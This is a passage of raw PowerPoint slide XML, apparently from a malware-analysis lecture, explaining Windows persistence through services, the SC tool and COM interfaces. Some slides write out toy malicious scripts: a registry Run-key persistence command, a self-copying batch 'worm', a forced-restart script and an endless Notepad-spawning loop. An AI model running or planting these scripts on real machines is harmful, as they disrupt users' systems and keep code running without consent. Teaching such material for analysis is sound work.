              </a:rPr>
              <a:t> add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hkey_current_usersoftwaremicrosoftwindowscurrentve</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rsionrun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CONTROLexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg_sz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /d c:windowswimn32.bat /f</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echo You Have Been HACKED!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PAUSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816707" y="2827743"/>
            <a:ext cx="4306317" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; log off the computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shutdown -r</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4469063"/>
            <a:ext cx="5292080" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; Simple Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares\virus.bat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Malwares\virus.bat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418426" y="3843406"/>
            <a:ext cx="4726743"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rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>SAPI.SpVoice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>”).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Speak”I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> love YOU”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4163044" y="5187692"/>
            <a:ext cx="4997450" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;Endless Notepads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ECHO off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:top</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>START %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SystemRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%\system32\notepad.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GOTO top</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29096990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52" y="1556792"/>
            <a:ext cx="7555696"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a:off x="5940152" y="1907540"/>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62576" y="1722874"/>
            <a:ext cx="1374543" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> name</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296542889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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Another way for malware to execute additional code is by installing it as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>a service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ormally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>run as SYSTEM or another privileged account</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>another way to maintain persistence on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>system, automatically run when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>the OS starts, and may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>not even </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>show up in the Task Manager as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>process.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Services can be installed and manipulated via a few Windows API functions</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OpenSCManager</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateService</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>StartService</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2600" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>in the registry: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8429584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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>WIN32_SHARE_PROCESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Svchost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>WIN32_OWN_PROCESS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>KERNEL_DRIVER </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>SC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>program, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>qc “Spooler”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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6833"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331640" y="4060244"/>
            <a:ext cx="6812705" cy="2537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588409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normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Component Object Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(COM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> standard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>that makes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>it possible for different software components to call each other’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>code without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>knowledge of specifics about each other</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>COM works with any programming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>language, especially OOP languages.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>COM is implemented as a client/server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>framework.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Each thread that uses COM must call the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OleInitialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CoInitializeEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>at least once prior to calling any other COM library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Access via</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Class Identifiers (CLSIDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Interface Identifiers (IIDs)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11966876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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Common COM functions/interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CoCreateInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: get access COM functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Navigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: allows a program to launch IE and access a website. It is a part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IWebBrowser2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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943" y="2996952"/>
            <a:ext cx="5995018" cy="2357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7613" y="5373216"/>
            <a:ext cx="8563678" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
